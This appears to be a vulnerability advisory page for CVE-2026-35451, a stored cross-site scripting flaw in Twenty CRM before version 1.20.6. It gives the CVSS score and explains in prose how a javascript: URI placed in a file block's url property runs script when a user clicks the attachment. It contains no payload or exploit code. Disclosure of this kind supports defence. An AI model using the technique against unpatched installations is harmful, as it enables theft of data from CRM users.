Twenty CRM EUVD-2026-24161

| CVE-2026-35451 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-04-21 GitHub_M
XSS
5.7
CVSS 3.1
Share

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

2
Patch available
Apr 21, 2026 - 18:01 EUVD
Analysis Generated
Apr 21, 2026 - 17:34 vuln.today

DescriptionNVD

Twenty is an open source CRM. Prior to 1.20.6, a Stored Cross-Site Scripting (XSS) vulnerability exists in the BlockNote editor component. Due to a lack of protocol validation in the FileBlock component and insufficient server-side inspection of block content, an attacker can inject a javascript: URI into the url property of a file block. This allows the execution of arbitrary JavaScript when a user clicks on the malicious file attachment. This vulnerability is fixed in 1.20.6.

AnalysisAI

Stored cross-site scripting in Twenty CRM versions prior to 1.20.6 allows authenticated attackers to inject malicious JavaScript URIs into file block attachments via the BlockNote editor, executing arbitrary code in the browsers of users who click the malicious link. The vulnerability bypasses protocol validation in the FileBlock component and lacks server-side sanitization of block content; exploitation requires user interaction (clicking the attachment) but persistence is stored on the server, affecting all subsequent users who view the compromised document.

Sign in for full analysis, threat intelligence, and remediation guidance.

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

Sign in - Free

Share

EUVD-2026-24161 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy